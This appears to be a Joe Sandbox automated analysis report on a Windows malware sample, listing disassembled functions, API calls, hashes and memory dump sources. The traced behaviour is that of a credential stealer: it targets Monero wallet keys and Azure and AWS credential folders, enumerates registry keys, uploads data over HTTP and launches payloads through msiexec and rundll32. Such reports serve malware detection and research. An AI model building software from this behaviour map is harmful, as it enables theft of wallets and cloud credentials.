                              • Opcode ID: c93efbfb554fe51a3a1d708d7d6330321a76307e27a4e709830bf6e807f6f218
                              • Instruction ID: ca85c5af8de1a16ba6dc09c996cde927b3e833608092b61f83a3eaf2ec49047e
                              • Opcode Fuzzy Hash: c93efbfb554fe51a3a1d708d7d6330321a76307e27a4e709830bf6e807f6f218
                              • Instruction Fuzzy Hash: 30121171920118AADB19EBA4DC96FEEB378FF14700F5141A9B506F3091EF706A4ACF52
                              Function 0085CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 00868B60: GetSystemTime.KERNEL32(00870E1A,015CA088,008705AE,?,?,008513F9,?,0000001A,00870E1A,00000000,?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 00868B86
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0085CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0085D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0085D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D208
                              • lstrcat.KERNEL32(?,00871478), ref: 0085D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D22A
                              • lstrcat.KERNEL32(?,0087147C), ref: 0085D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D24C
                              • lstrcat.KERNEL32(?,00871480), ref: 0085D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D26E
                              • lstrcat.KERNEL32(?,00871484), ref: 0085D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D290
                              • lstrcat.KERNEL32(?,00871488), ref: 0085D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D2B2
                              • lstrcat.KERNEL32(?,0087148C), ref: 0085D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0085D2D4
                              • lstrcat.KERNEL32(?,00871490), ref: 0085D2E3
                                • Part of subcall function 0086A820: lstrlen.KERNEL32(00854F05,?,?,00854F05,00870DDE), ref: 0086A82B
                                • Part of subcall function 0086A820: lstrcpy.KERNEL32(00870DDE,00000000), ref: 0086A885
                              • lstrlen.KERNEL32(?), ref: 0085D32A
                              • lstrlen.KERNEL32(?), ref: 0085D339
                                • Part of subcall function 0086AA70: StrCmpCA.SHLWAPI(015C89D0,0085A7A7,?,0085A7A7,015C89D0), ref: 0086AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0085D3B4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: fc023ebcd9fd9b85c52bec627cb3354be202ee9b786927c56c3662878a2bc775
                              • Instruction ID: a6245947ab82dfd43b7d7b223e184c09a50f9d2c468ea6a27c7af387c3a7ceeb
                              • Opcode Fuzzy Hash: fc023ebcd9fd9b85c52bec627cb3354be202ee9b786927c56c3662878a2bc775
                              • Instruction Fuzzy Hash: 80E1BA719101049BCB08EBA4DD96EEE7379FF24301F11416AB506F7191DE35AA06CFA3
                              Function 00854880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00854915
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 0085493A
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00854ABA
                              • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00870DDB,00000000,?,?,00000000,?,",00000000,?,015CE590), ref: 00854DE8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00854E04
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00854E18
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00854E49
                              • InternetCloseHandle.WININET(00000000), ref: 00854EAD
                              • InternetCloseHandle.WININET(00000000), ref: 00854EC5
                              • HttpOpenRequestA.WININET(00000000,015CE560,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00854B15
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                              • InternetCloseHandle.WININET(00000000), ref: 00854ECF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 460715078-2180234286
                              • Opcode ID: d6bc02d31d548fce413e180dad7b2b6358129020c9be046ca82574b189d57054
                              • Instruction ID: a6b914ebbc1153f8a58cc426a52c9028156f747bf37e6ce990c93d8bd3b9654f
                              • Opcode Fuzzy Hash: d6bc02d31d548fce413e180dad7b2b6358129020c9be046ca82574b189d57054
                              • Instruction Fuzzy Hash: 6112D871910118AADB19EB98DD92FEEB739FF14300F5141A9B506B3091EF706B4ACF62
                              Function 0085C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                                • Part of subcall function 0086A920: lstrcpy.KERNEL32(00000000,?), ref: 0086A972
                                • Part of subcall function 0086A920: lstrcat.KERNEL32(00000000), ref: 0086A982
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                                • Part of subcall function 0086A9B0: lstrlen.KERNEL32(?,015C8AA0,?,\Monero\wallet.keys,00870E17), ref: 0086A9C5
                                • Part of subcall function 0086A9B0: lstrcpy.KERNEL32(00000000), ref: 0086AA04
                                • Part of subcall function 0086A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0086AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015CCCD8,00000000,?,0087144C,00000000,?,?), ref: 0085CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0085CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0085CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0085CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0085CAD9
                              • StrStrA.SHLWAPI(?,015CCD80,00870B52), ref: 0085CAF7
                              • StrStrA.SHLWAPI(00000000,015CCD08), ref: 0085CB1E
                              • StrStrA.SHLWAPI(?,015CD698,00000000,?,00871458,00000000,?,00000000,00000000,?,015C8890,00000000,?,00871454,00000000,?), ref: 0085CCA2
                              • StrStrA.SHLWAPI(00000000,015CD578), ref: 0085CCB9
                                • Part of subcall function 0085C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0085C871
                                • Part of subcall function 0085C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0085C87C
                              • StrStrA.SHLWAPI(?,015CD578,00000000,?,0087145C,00000000,?,00000000,015C8970), ref: 0085CD5A
                              • StrStrA.SHLWAPI(00000000,015C8A80), ref: 0085CD71
                                • Part of subcall function 0085C820: lstrcat.KERNEL32(?,00870B46), ref: 0085C943
                                • Part of subcall function 0085C820: lstrcat.KERNEL32(?,00870B47), ref: 0085C957
                                • Part of subcall function 0085C820: lstrcat.KERNEL32(?,00870B4E), ref: 0085C978
                              • lstrlen.KERNEL32(00000000), ref: 0085CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0085CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 5b2b1bce694f80e17133ff150cfd7a6f810307c40e40c45adf39006427f8cd19
                              • Instruction ID: 9142941a2dd7eba0f79379ce0a1af9fd67ad5a0801a30b825a71e0906757948b
                              • Opcode Fuzzy Hash: 5b2b1bce694f80e17133ff150cfd7a6f810307c40e40c45adf39006427f8cd19
                              • Instruction Fuzzy Hash: 4CE1EE71910108ABDB18EBA8DC96FEE7779FF14300F514169F506B7191DE306A4ACFA2
                              Function 00868320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • RegOpenKeyExA.ADVAPI32(00000000,015CAE20,00000000,00020019,00000000,008705B6), ref: 008683A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00868426
                              • wsprintfA.USER32 ref: 00868459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0086847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0086848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00868499
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: 5b27052e28f799621103bbe57273d7338473368f9600e572bf7799a386672118
                              • Instruction ID: bf218bdff2c548ada55bd9fe2b8e7a9d7cb972aacb8b16b0080a70c205e2153a
                              • Opcode Fuzzy Hash: 5b27052e28f799621103bbe57273d7338473368f9600e572bf7799a386672118
                              • Instruction Fuzzy Hash: 5B81FA71910118ABDB28DB54CD95FEAB7B8FF58700F008299E50AA6140DF756B86CFD1
                              Function 00864D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00868DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00868E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00864DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00864DCD
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 0086492C
                                • Part of subcall function 00864910: FindFirstFileA.KERNEL32(?,?), ref: 00864943
                              • lstrcat.KERNEL32(?,00000000), ref: 00864E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00864E59
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FDC), ref: 00864971
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,00870FE0), ref: 00864987
                                • Part of subcall function 00864910: FindNextFileA.KERNEL32(000000FF,?), ref: 00864B7D
                                • Part of subcall function 00864910: FindClose.KERNEL32(000000FF), ref: 00864B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00864EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00864EE5
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 008649B0
                                • Part of subcall function 00864910: StrCmpCA.SHLWAPI(?,008708D2), ref: 008649C5
                                • Part of subcall function 00864910: wsprintfA.USER32 ref: 008649E2
                                • Part of subcall function 00864910: PathMatchSpecA.SHLWAPI(?,?), ref: 00864A1E
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,015CE500), ref: 00864A4A
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,00870FF8), ref: 00864A5C
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,?), ref: 00864A70
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,00870FFC), ref: 00864A82
                                • Part of subcall function 00864910: lstrcat.KERNEL32(?,?), ref: 00864A96
                                • Part of subcall function 00864910: CopyFileA.KERNEL32(?,?,00000001), ref: 00864AAC
                                • Part of subcall function 00864910: DeleteFileA.KERNEL32(?), ref: 00864B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 33d31373b1081d3fa35868efb2f39712d57c7de103c97c477efec343dce549a5
                              • Instruction ID: 34b223b68d3aa2abbdb2ba744773ca3406988e6579b210c342f04d84a7c6ffb0
                              • Opcode Fuzzy Hash: 33d31373b1081d3fa35868efb2f39712d57c7de103c97c477efec343dce549a5
                              • Instruction Fuzzy Hash: 53416D7AA4020466CB54F7B4EC4BFDD7238FB24701F008595B689E61C5EEB897898B93
                              Function 00869010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0086906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 5ed949630616a3f8dbb7d24e8db87e5175a508d707b47fcaa4291d298185803b
                              • Instruction ID: 9a06364319f55b5075986dd76971b128770d2eaa21ad14c4d382b9927a1278fa
                              • Opcode Fuzzy Hash: 5ed949630616a3f8dbb7d24e8db87e5175a508d707b47fcaa4291d298185803b
                              • Instruction Fuzzy Hash: F871DAB1A10208ABDB04DBE4DD89FEEB7B8FB58701F108509F515E7290DB34A905CBA2
                              Function 00862E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008631C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0086335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 008634EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 03ab2978e96cefb50a4b0a002064ed3443cf7d4866edbdc9d01cc395b1bfc42a
                              • Instruction ID: ef1af086be10d2ddde9b16e92968589c5026b7d49a44ffbcf84723c942c499e6
                              • Opcode Fuzzy Hash: 03ab2978e96cefb50a4b0a002064ed3443cf7d4866edbdc9d01cc395b1bfc42a
                              • Instruction Fuzzy Hash: E912E8718101089ADB19EBA4DD92EEEB738FF14300F514169E506B7191EF746B4ACFA3
                              Function 008652C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 00856280: InternetOpenA.WININET(00870DFE,00000001,00000000,00000000,00000000), ref: 008562E1
                                • Part of subcall function 00856280: StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856303
                                • Part of subcall function 00856280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00856335
                                • Part of subcall function 00856280: HttpOpenRequestA.WININET(00000000,GET,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00856385
                                • Part of subcall function 00856280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008563BF
                                • Part of subcall function 00856280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008563D1
                                • Part of subcall function 0086A8A0: lstrcpy.KERNEL32(?,00870E17), ref: 0086A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00865318
                              • lstrlen.KERNEL32(00000000), ref: 0086532F
                                • Part of subcall function 00868E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00868E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00865364
                              • lstrlen.KERNEL32(00000000), ref: 00865383
                              • lstrlen.KERNEL32(00000000), ref: 008653AE
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              Strings
